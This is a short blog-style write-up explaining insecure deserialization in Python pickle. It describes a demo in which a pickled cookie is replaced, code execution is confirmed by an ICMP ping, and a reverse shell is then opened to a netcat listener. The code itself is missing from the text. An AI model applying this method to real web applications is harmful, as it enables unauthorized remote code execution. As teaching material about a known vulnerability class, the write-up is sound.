Insecure Deserialization Attack with Python Pickle
Intro : Hello Hackers this is my New Writeup on Insecure deserialization. It is Rare Attack found in Web but Dangerous. It is a vulnerability in which untrusted or unknown data is used to inflict a denial-of-service attack, execute code, bypass authentication or otherwise abuse the logic behind an application. Today we will discuss with a Practical Demo.
What is Serialization :
Serialization is the process of converting complex data structures, such as objects and their fields, into a format that can be sent and received as a sequential stream of bytes.
What is Deserialization :
Deserialization is the process of converting a sequential stream of bytes in it’s normal object form.
Note : It is like something when we Send a Number it will convert into Strems of Data called Binary Form (Serialization) and when someone get it; it will again convert into its Decimal form (Deserialization).
Practical Example :
Let’s assume here is Web Page with search Function.
Then we search something and capture it into our BurpSuite.
Here in the Response there are 2 Set-Cookie value one is a CSRF Token and other is something odd like. Actually it is a Python Serialized Object Value. When we decode the value we will get a Complex Format along with what we search.
We can do it with Python Pickle Module.
So we can abuse this Value because the same Cookie also attached with the Request. So first we have to make our own Serialized Object with some Test Command.
Here is the Code.
Note : Checking if there any Code Execution .
Then ran it and we will get a Object Value.
Then I set my Tcpdump Listener and change the Cookie Value with a new Value that we created.
And after hitting send I get a ICMP request back means Code Execution present Here.
So I change the Python3 Code with a Reverse Shell and ran it again.
Then I again change the Cookie Value with this New one.
And after hitting send Suddenly in our Netcat Listener I get a Reverse Shell.
And that’s it. This is how it can Exploitable.
THANKS FOR READING!
If you like it don’t forget to Follow me for more Articles.
Happy Hacking~
